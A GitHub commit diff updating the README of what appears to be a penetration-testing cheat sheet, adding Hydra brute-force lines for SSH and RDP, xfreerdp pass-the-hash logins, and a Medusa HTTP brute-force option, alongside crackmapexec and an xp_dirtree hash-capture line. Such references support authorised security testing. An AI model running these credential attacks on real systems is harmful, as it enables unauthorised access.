Update README.md

This commit is contained in:
Joe Totes
2022-10-22 10:02:20 -04:00
committed by GitHub
parent 06a57b4d5a
commit 313187af6e

View File

@@ -236,7 +236,8 @@ scp /path/to/source/file.ext username@{RHOST}:/path/to/destination
scp -r /path/to/source/dir username@{RHOST}:/path/to/destination scp -r /path/to/source/dir username@{RHOST}:/path/to/destination
# Hydra brute force # Hydra brute force
hydra -l {USER} -P /usr/share/wordlists/rockyou.txt ssh://{IP ADDRESS} hydra -f -l {USER} -P /usr/share/wordlists/rockyou.txt ssh://{IP ADDRESS}
hydra -f -t 16 -L {user.txt} -P {pass.txt} ssh://{RHOST}
# Crackmap brute force # Crackmap brute force
crackmapexec ssh {IP ADDRESS} -u {USER.txt} -p {PASSWORD.txt} crackmapexec ssh {IP ADDRESS} -u {USER.txt} -p {PASSWORD.txt}
@@ -650,6 +651,21 @@ sql> xp_dirtree "\\{IP ADDRESS}\test"
<br /> <br />
## RDP [3389]
<br />
```bash
# Remote Connect Password or Hash
xfreerdp /u:{USER} /p:'{PASS}' /cert:ignore /v:{RHOST} /dynamic-resolution
xfreerdp /u:{USER} /pth:'{HASH}' /cert:ignore /v:{RHOST} /dynamic-resolution
# Brute Force RDP
hydra -f -t 16 -L {user.txt} -P {pass.txt} rdp://{RHOST}
```
## WINRM [5985, 5986] ## WINRM [5985, 5986]
@@ -1651,7 +1667,7 @@ username=admin$password=FUZZ
username=WFUZZ$password=HFUZZ username=WFUZZ$password=HFUZZ
# Medusa # Medusa
medusa -h {IP ADDRESS} -u {USER} -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/{DIR} medusa -f -h {IP ADDRESS} -u {USER} -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/{DIR}
``` ```
<br /> <br />